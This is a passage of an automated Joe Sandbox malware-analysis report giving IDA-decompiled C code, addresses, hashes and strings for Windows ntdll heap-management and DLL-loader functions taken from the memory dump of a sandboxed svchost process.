                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 9a464d669748bbd484abc4a5b3ab564d1381b6152d70ff84e3fe723ea6c100d9
                        • Instruction ID: 49f19fb4f3babfad79798a90373079b45fb0f6bd65ea53a6ca548edafd5ac36a
                        • Opcode Fuzzy Hash: 9a464d669748bbd484abc4a5b3ab564d1381b6152d70ff84e3fe723ea6c100d9
                        • Instruction Fuzzy Hash: 87014076153754AEE239F768D40DFD67BE4DB81B30F194069F0094FA81CAA554C4C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E0304A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x3118748 - 1;
					if( *0x3118748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0302B150();
									_t260 = _t257 + 4;
								} else {
									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0302B150();
								_t257 = _t260 + 4;
								__eflags =  *0x3117bc8;
								if(__eflags == 0) {
									E030E2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E030EA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0307D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0304AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E030EA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E030EA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x3118748 - 1;
					if( *0x3118748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0302B150();
							} else {
								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0302B150();
							__eflags =  *0x3117bc8;
							if(__eflags == 0) {
								_t131 = E030E2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                        0x0304a83a
                        0x0304a83c
                        0x0304a83e
                        0x0304a841
                        0x0304a844
                        0x0304a84a
                        0x0304aa53
                        0x0304aa59
                        0x0304aa59
                        0x0304a858
                        0x0304a85e
                        0x0304aaf5
                        0x0304aafc
                        0x0309229e
                        0x030922a2
                        0x030922a8
                        0x030922b3
                        0x030922b5
                        0x030922bb
                        0x030922c1
                        0x030922c5
                        0x030922e6
                        0x030922eb
                        0x030922f0
                        0x030922c7
                        0x030922dc
                        0x030922e1
                        0x030922e1
                        0x030922f3
                        0x030922f8
                        0x030922fd
                        0x03092300
                        0x03092307
                        0x0309230e
                        0x0309230e
                        0x03092313
                        0x03092313
                        0x030922b5
                        0x030922a2
                        0x0304aafc
                        0x0304a864
                        0x0304a869
                        0x0304aa5c
                        0x0304aa5e
                        0x0304a86f
                        0x0304a87f
                        0x0304a885
                        0x0304a885
                        0x0304a88b
                        0x0304a890
                        0x0304a896
                        0x0304ab0c
                        0x0304ab0f
                        0x0304ab15
                        0x03092320
                        0x03092320
                        0x0304ab1b
                        0x0304a89c
                        0x0304a89f
                        0x0304a8a2
                        0x0304a8a2
                        0x0304a8a5
                        0x0304a8af
                        0x0304a8b3
                        0x0304a8b8
                        0x0304aa66
                        0x0304a8be
                        0x0304a8c5
                        0x0304a8c6
                        0x0304a8ce
                        0x03092328
                        0x03092332
                        0x03092337
                        0x03092337
                        0x0304a8ce
                        0x0304a8d4
                        0x0304a8d8
                        0x0304a8db
                        0x0304a8de
                        0x0304a8e1
                        0x0304a8e5
                        0x0304a8e8
                        0x0304a8f0
                        0x0304a8f3
                        0x0309234c
                        0x03092350
                        0x03092355
                        0x03092359
                        0x03092359
                        0x0304a8f9
                        0x0304a901
                        0x0304aae4
                        0x0304aae4
                        0x0304aaea
                        0x00000000
                        0x0304a907
                        0x0304a90a
                        0x0304a91d
                        0x0304a91d
                        0x00000000
                        0x0304a910
                        0x0304a910
                        0x0304a910
                        0x0304a914
                        0x0304a924
                        0x0304a924
                        0x0304a924
                        0x0304a924
                        0x0304a916
                        0x0304a91b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304a91b
                        0x0304a925
                        0x0304a925
                        0x0304a932
                        0x0304a936
                        0x0304a93c
                        0x0304a93c
                        0x0304a93c
                        0x0304ab22
                        0x0304ab24
                        0x0304ab27
                        0x0304ab27
                        0x0304a942
                        0x0304a944
                        0x0304aaba
                        0x0304aabd
                        0x0304aac0
                        0x0304aac0
                        0x0304aac2
                        0x0304ab2f
                        0x0304aac4
                        0x0304aac4
                        0x0304aac7
                        0x0304aaca
                        0x0304aacc
                        0x0304aace
                        0x0304aace
                        0x0304aace
                        0x0304aad1
                        0x0304aad1
                        0x0304aad7
                        0x0304aad9
                        0x00000000
                        0x00000000
                        0x03092361
                        0x03092369
                        0x0309236b
                        0x00000000
                        0x03092371
                        0x00000000
                        0x03092371
                        0x00000000
                        0x0309236b
                        0x0304aac0
                        0x0304a94a
                        0x0304a94a
                        0x0304a94d
                        0x0304a94d
                        0x0304a950
                        0x0304a954
                        0x03092376
                        0x03092380
                        0x0304a95a
                        0x0304a95a
                        0x0304a95c
                        0x0304a95f
                        0x0304a961
                        0x0304a961
                        0x0304a967
                        0x0304a96a
                        0x0304a972
                        0x0304aa02
                        0x0304aa06
                        0x0304aa10
                        0x0304aa16
                        0x0304aa16
                        0x0304aa1b
                        0x0304aa21
                        0x0304aa24
                        0x0304aa27
                        0x0304aa29
                        0x0304aa2c
                        0x0304aa32
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304a978
                        0x0304a978
                        0x0304a97b
                        0x0304a981
                        0x0304a996
                        0x0304a998
                        0x0304a99f
                        0x0304a9a2
                        0x0309238a
                        0x0304a9a8
                        0x0304a9a8
                        0x0304a9a8
                        0x0304a9aa
                        0x0304a9ad
                        0x0304a9b0
                        0x0304a9bb
                        0x0304a9be
                        0x0304a9c7
                        0x0304a9c9
                        0x0304a9c9
                        0x0304a9cc
                        0x0304a9d1
                        0x0304aa6d
                        0x0304aa70
                        0x0304aa73
                        0x0304aa75
                        0x0304aa79
                        0x0304aa7e
                        0x0304aa82
                        0x0304aa8f
                        0x0304aa94
                        0x0304aa96
                        0x03092392
                        0x030923a1
                        0x030923a1
                        0x0304aa9c
                        0x0304aa9f
                        0x0304aaa2
                        0x0304aaa2
                        0x0304aaa8
                        0x0304aaab
                        0x0304aaaf
                        0x00000000
                        0x0304aab5
                        0x00000000
                        0x0304aab5
                        0x0304a9d7
                        0x0304a9d7
                        0x0304a9da
                        0x0304a9e0
                        0x0304a9e3
                        0x0304a9e6
                        0x0304a9e9
                        0x0304a9eb
                        0x0304a9fd
                        0x0304a9fd
                        0x00000000
                        0x0304a9eb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304a983
                        0x0304a983
                        0x0304a983
                        0x0304a987
                        0x0304a995
                        0x0304a995
                        0x0304a995
                        0x0304a995
                        0x0304a989
                        0x0304a98e
                        0x00000000
                        0x0304a990
                        0x00000000
                        0x0304a990
                        0x0304a98e
                        0x00000000
                        0x0304a983
                        0x0304a972
                        0x0304a90a
                        0x0304aa34
                        0x0304aa34
                        0x0304aa40
                        0x0304aa43
                        0x0304aa46
                        0x0304aa4d
                        0x030923ab
                        0x030923b2
                        0x030923b8
                        0x030923be
                        0x030923c3
                        0x030923c5
                        0x030923cb
                        0x030923d1
                        0x030923d5
                        0x030923f6
                        0x030923fb
                        0x030923d7
                        0x030923ec
                        0x030923f1
                        0x03092403
                        0x03092408
                        0x03092410
                        0x03092417
                        0x03092422
                        0x03092422
                        0x03092417
                        0x030923c5
                        0x030923b2
                        0x00000000

                        Strings
                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030922F3
                        • HEAP: , xrefs: 030922E6, 030923F6
                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03092403
                        • HEAP[%wZ]: , xrefs: 030922D7, 030923E7
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                        • API String ID: 0-1657114761
                        • Opcode ID: af0677a26c0b22b13cf56e4231b56abfa93b1e24aaa351357b7b581841f035a7
                        • Instruction ID: 76e3b7e1864b39302a68f958446e1958ee95eafede377942337f01f25ed6aa79
                        • Opcode Fuzzy Hash: af0677a26c0b22b13cf56e4231b56abfa93b1e24aaa351357b7b581841f035a7
                        • Instruction Fuzzy Hash: B0D1BEB4B422459FDB18CF68C590BAAB7F5FF88300F198979D8569B742E330EA45CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E0304A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0304DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03069730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E030EA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03069660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0302B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E03047D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E030E138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E03047D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E03047D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E030E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E03047D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E03047D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E030E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0307D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                        0x0304a229
                        0x0304a231
                        0x0304a23f
                        0x0304a242
                        0x0304a244
                        0x0304a24c
                        0x0304a255
                        0x0304a25a
                        0x0304a25f
                        0x03091c76
                        0x03091c78
                        0x03091c7e
                        0x03091c7f
                        0x03091c81
                        0x03091c82
                        0x03091c84
                        0x03091c89
                        0x03091c8b
                        0x03091c9e
                        0x03091c9e
                        0x03091cab
                        0x03091cb2
                        0x00000000
                        0x03091cb2
                        0x03091c8d
                        0x03091c92
                        0x00000000
                        0x00000000
                        0x03091c94
                        0x03091c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03091c98
                        0x0304a265
                        0x0304a265
                        0x0304a266
                        0x0304a26f
                        0x0304a270
                        0x0304a276
                        0x0304a277
                        0x0304a279
                        0x0304a27e
                        0x0304a282
                        0x03091db5
                        0x03091dbb
                        0x03091dc1
                        0x03091dc5
                        0x03091de4
                        0x03091de9
                        0x03091dc7
                        0x03091ddc
                        0x03091de1
                        0x03091def
                        0x03091df3
                        0x03091df7
                        0x03091dfe
                        0x03091e06
                        0x0304a302
                        0x0304a308
                        0x0304a308
                        0x0304a288
                        0x0304a28d
                        0x0304a294
                        0x03091cc1
                        0x0304a29a
                        0x0304a29a
                        0x0304a29a
                        0x0304a29f
                        0x03091ccb
                        0x03091cd1
                        0x03091cd8
                        0x03091cea
                        0x03091cea
                        0x03091cd8
                        0x0304a2a9
                        0x0304a2af
                        0x0304a2bc
                        0x03091cfd
                        0x0304a2c2
                        0x0304a2c2
                        0x0304a2c2
                        0x0304a2c7
                        0x03091d07
                        0x03091d0d
                        0x03091d14
                        0x03091d1f
                        0x03091d21
                        0x03091d2c
                        0x03091d2c
                        0x03091d2c
                        0x03091d47
                        0x03091d47
                        0x03091d14
                        0x0304a2cd
                        0x0304a2d2
                        0x0304a2d9
                        0x03091d5a
                        0x0304a2df
                        0x0304a2df
                        0x0304a2df
                        0x0304a2e4
                        0x03091d69
                        0x03091d6b
                        0x03091d76
                        0x03091d76
                        0x03091d76
                        0x03091d91
                        0x03091d91
                        0x0304a2ea
                        0x0304a2f0
                        0x0304a2f5
                        0x03091da8
                        0x03091dad
                        0x03091dad
                        0x0304a2fd
                        0x0304a300
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                        • API String ID: 2994545307-2586055223
                        • Opcode ID: 9b869449473275f07559ed2d075e68c448b5d6d028ca6901558ad13069073f6f
                        • Instruction ID: fe2c3eee67797bf72f8ea3edef82abb6e99eab9eb08e25fe88bbeb99d97bea2f
                        • Opcode Fuzzy Hash: 9b869449473275f07559ed2d075e68c448b5d6d028ca6901558ad13069073f6f
                        • Instruction Fuzzy Hash: 6F5134B2307781AFE726DB68C944F6BB7E8EF84B50F080865F4618B291D734D900DB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03058E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E03058E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x311d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3118464; // 0x76c90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3115780 & 0x00000003) != 0) {
							E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3115780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0306B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3117984; // 0x2803540
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3118464; // 0x76c90110
					 *0x311b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03059B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3115780 & 0x00000005) != 0) {
						_push(_t49);
						E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
